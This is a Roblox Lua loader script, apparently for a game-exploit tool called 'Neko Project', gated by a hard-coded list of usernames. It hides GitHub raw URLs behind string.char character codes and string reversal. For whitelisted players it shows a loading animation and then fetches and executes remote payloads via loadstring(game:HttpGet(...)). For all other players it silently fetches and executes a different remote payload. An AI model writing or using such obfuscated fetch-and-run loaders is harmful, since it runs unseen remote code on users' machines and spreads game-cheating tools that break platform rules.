--[[白名單]]--
local Players = game:GetService("Players")
local CoreGui = game:GetService("CoreGui")
local TweenService = game:GetService("TweenService")
local lp = Players.LocalPlayer

-- 混淆後的 _0xUrl
local _0xUrl = (function()
    local t = {}
    t[1] = string.char(104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109)
    t[2] = string.char(47,83,76,79,84,72,45,110,101,111,47,83,108,111,116,104,47,114,101,102,115,47,104,101,97,100,115,47,109,97,105,110,47,78,69,75,79)
    return table.concat(t)
end)()

local Whitelist = {
    ["Zn6xx"] = true,
    ["jay04_23"] = true, 
    ["robloxasdft114"] = true,
    ["YuXin_107"] = true,
    ["XanYU0322"] = true,
    ["iandsere"] = true,
    ["YangXiong1023"] = true,
    ["dgigeprhg"] = true, 
    ["Kadys5373"] = true,
    ["dt106101zz"] = true,
    ["yoyowww99100"] = true
}

local function LaunchNeko()
    task.spawn(function()
        local success, content = pcall(function() return game:HttpGet(_0xUrl) end)
        if success and content then
            local loader = loadstring(content)
            if loader then loader() end
        end
    end)
end

if not Whitelist[lp.Name] then
    pcall(function()
        -- 混淆 NO 連結
        local noUrl = string.reverse(string.char(79,78) .. "/" .. string.char(110,105,97,109,47,115,104,101,108,83,45,79,84,72,76,79,83,47,115,102,101,114,47,115,100,101,104,47,119,97,114,46,116,110,101,116,110,111,99,46,98,117,104,116,105,103,46,119,97,114)
        loadstring(game:HttpGet(noUrl))()
    end)
    return
end

local sg = Instance.new("ScreenGui")
sg.Name = "Neko_Owner_Loading"
sg.ResetOnSpawn = false
pcall(function() sg.Parent = CoreGui end)
if not sg.Parent then sg.Parent = lp:WaitForChild("PlayerGui") end

local Main = Instance.new("Frame", sg)
Main.Size = UDim2.new(0, 360, 0, 160)
Main.Position = UDim2.new(0.5, -180, 0.5, -80)
Main.BackgroundColor3 = Color3.fromRGB(12, 12, 12)
Main.BackgroundTransparency = 0.1
Main.BorderSizePixel = 0
Instance.new("UICorner", Main).CornerRadius = UDim.new(0, 15)

local mStroke = Instance.new("UIStroke", Main)
mStroke.Thickness = 3
mStroke.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
local mGradient = Instance.new("UIGradient", mStroke)
mGradient.Color = ColorSequence.new{
    ColorSequenceKeypoint.new(0, Color3.fromRGB(0, 170, 255)),
    ColorSequenceKeypoint.new(0.5, Color3.fromRGB(255, 120, 180)),
    ColorSequenceKeypoint.new(1, Color3.fromRGB(0, 170, 255))
}

task.spawn(function()
    local info = TweenInfo.new(4, Enum.EasingStyle.Linear, Enum.EasingDirection.In, -1)
    local tween = TweenService:Create(mGradient, info, {Rotation = 360})
    tween:Play()
end)

local Title = Instance.new("TextLabel", Main)
Title.Size = UDim2.new(1, 0, 0, 60)
Title.Text = "N E K O   P R O J E C T"
Title.TextColor3 = Color3.fromRGB(255, 255, 255)
Title.BackgroundTransparency = 1
Title.Font = Enum.Font.GothamBold
Title.TextSize = 20

local infoLabel = Instance.new("TextLabel", Main)
infoLabel.Size = UDim2.new(1, 0, 0, 40)
infoLabel.Position = UDim2.new(0, 0, 0.4, 0)
infoLabel.Text = "歡迎回來，主人喵..."
infoLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
infoLabel.BackgroundTransparency = 1
infoLabel.Font = Enum.Font.GothamBold
infoLabel.TextSize = 14

local barBg = Instance.new("Frame", Main)
barBg.Size = UDim2.new(0, 280, 0, 6)
barBg.Position = UDim2.new(0.5, -140, 0.7, 0)
barBg.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
Instance.new("UICorner", barBg)

local bar = Instance.new("Frame", barBg)
bar.Size = UDim2.new(0, 0, 1, 0)
bar.BackgroundColor3 = Color3.fromRGB(0, 170, 255)
Instance.new("UICorner", bar)

task.spawn(function()
    pcall(function()
        -- 混淆 YES 連結
        local yesParts = {
            string.char(104,116,116,112,115,58,47,47),
            string.char(114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109),
            "/" .. string.char(83,76,79,84,72,45,110,101,111,47,83,108,111,116,104,47,114,101,102,115,47,104,101,97,100,115,47,109,97,105,110,47),
            string.char(89,69,83)
        }
        local yesUrl = table.concat(yesParts)
        loadstring(game:HttpGet(yesUrl))()
    end)
end)

local barTween = TweenService:Create(bar, TweenInfo.new(2.5, Enum.EasingStyle.Quart), {Size = UDim2.new(1, 0, 1, 0)})
barTween:Play()

barTween.Completed:Connect(function()
    infoLabel.Text = "核心載入完成！🐾"
    task.wait(0.5)
    TweenService:Create(Main, TweenInfo.new(0.5), {Size = UDim2.new(0,0,0,0), BackgroundTransparency = 1}):Play()
    task.wait(0.5)
    sg:Destroy()
    LaunchNeko()
end)
